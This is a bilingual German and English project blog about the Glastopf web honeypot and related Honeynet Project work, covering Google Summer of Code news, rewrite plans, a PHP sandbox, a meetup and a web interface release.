GlasBlog

Miguel Cabrerizo has written an Glastopf init script for Debian. Feel free to check it out from our repository. Thank you very much Miguel!

Das Honeynet Project und das Google Open Source Team haben sich entschlossen meine Bewerbung für den Google Summer of Code 2010 anzunehmen. Während dieser drei Monate werde ich an einem Instant Messenger Honeypot arbeiten. Ich bin sehr gespannt auf diese Zeit und bin froh, endlich die vielen Ideen in meinem Kopf in Code umsetzen zu können.

Neben der eigentlichen Entwicklung wird das verteilen der Instant Messaging “Köder Accounts” eine zentrale Rolle spielen. Ich spiele mit dem Gedanken hierfür unter anderem Sandbox Systeme zu verwenden.

Die Bewerbung des Honeynet Project für den diesjährigem Google Summer of Code wurde akzeptiert! Die vom Honeynet Projekt vorgeschlagenen Projekte kann man hier einsehen. Ich empfehle jedem interessierten Studenten sich das auf jeden Fall an zu sehen und falls man ein passendes Thema findet, Kontakt mit den Mentoren auf zu nehmen, oder eigene Ideen vorschlagen.

GSoC bietet eine hervorragende Möglichkeit Erfahrungen in einem Open Source Project zu sammeln. Hierzu gehört auch die Zusammenarbeit mit Menschen die sehr viel Erfahrung in diesem Gebiet haben. Für das Glastopf Projekt war es ein außerordentlicher Schub nach vorne und die geknüpften Kontakte eine große Bereicherung.

Today I will talk a bit about Glastopf and whats coming up the next months.

Glastopf:
Last Friday (22.01.) I met Sven. Sven is a bachelor student at the Bern university of applied sciences and will write his thesis about Glastopf. During his work he will make a total rewrite but when he will be finished the new version will have at least the same features like the old version. Those are the goals: A much better modular structure, this means there is one core which directs every request to the modules. They store the data, emulating the vulnerability and compose the response which the core gives back to the attacker. And there will be a much better classification of incoming attacks and the rules used for that will be totally detached from the source code to distribute them easily between different sensors. I will post some details as soon we started the work. This also means that we will freeze the current unstable version to put all effort into the new version.

PHP Sandbox:
I’m working on a connection between Glastopf and a PHP sandbox to classify the collected samples. Furthermore there is the possibility to reply common requests to a Glastopf sensor with the same perfectly emulated reply from the sandbox. The collected bots have a great potential to help us to do some research on web server botnets. More postings about this topic will follow.

Project:
We are also looking forward to intense our cooperations with interested universities and corporations. Especially with 1and1 and the Bern university of applied sciences. We are also officially integrating some peoples into the project who are already working on different parts in it.

Meeting:
End of March we are planning a meeting of all peoples interested in the project in Karlsruhe Germany. Goal is to push further the discussions, exchange knowledge, get to know each other and of curse drink some beer :) . There will be also some short talks on how we go further with the project and some of us will talk about how they use Glastopf. More information and in a near future the schedule, could be found in our wiki: GlasCon-3-2010

To move Glastopfs support away from the IRC data nirvana, we got a mailing list from the honeynet project. You can subscribe on the web interface: Mailman and browse the yet glorious archive right here: Pipermail. I’m looking forward to see some good discussions ;)

Jan Göbel hat einen ausführlichen Bericht über seinen low-interaction Honeypot Amun geschrieben. Das Paper zeigt ausführlich die Funktionsweise von Amun und wurde in der Hoffnung geschrieben einen tiefen Einblick zu geben um das Beisteuern von Schwachstellen Modulen zu fördern.

Englische Zusammenfassung:

In this report we describe a low-interaction honeypot, which is capable of capturing autonomous spreading malware from the internet, named Amun. For this purpose, the software emulates a wide range of different vulnerabilities. As soon as an attacker exploits one of the emulated vulnerabilities the payload transmitted by the attacker is analyzed and any download URL found is extracted. Next, the honeypot tries to download the malicious software and store it on the local harddisc, for further analyses. As a result, we are able to collect at best unknown binaries of malware that automatically spreads across the network. The collected samples can for example be used to help anti-virus vendors improve their signatures

Das Paper ist in der elektronischen Bibliothek der Uni Mannheim als PDF verfügbar.

Since a few days the Glastopf web interface version 0.0.1 first release candidate is available. Information about how to set up and the needed files could be found at our repository. This new web interface allows you to visualize and draw first conclusions about data collected with Glastopf.

Those who are using Glastopf have certainly thought about how to evaluate and further use the collected data. First we have the SURFids plug-in which allows you the use the SURFids web interface as a data analysis front end. If you prefer the easy way, send you data to the central database and use its web interface. Last but not least there is a web interface developed by peoples from the Glastopf project but it got a bit neglected the last months. Marcel Koßin noticed this lack and put a lot of effort into a rework. As soon the first version is finished and the repository works properly we will release more details and the source.

Since one year Glastopf is available for public. There has been a lot of changes during this year. Glastopf has been developed in many aspects and I’ve found many peoples (or they found me) who are very interested in the project and now working together with me. The coming year will bring a lot of changes, amongst others there will be an improvement of the attack classification, integration of a PHP sandbox, refinement of the vulnerability emulator and the development of the web interface. If nothing goes wrong I’ll be also able to write more documentation.

Since the Google Summer of Code 2009 I’m working together with the Honeynet Project and in retrospection I’ve benefited a lot from it and met excellent peoples. The Honeynet Project provides direct access to most of the peoples who are pathbreaking involved in Honeypot development and research. Since a few days I’m an official member of the Honeynet Chicago Chapter which provides me the possibility to give back my knowledge to the project.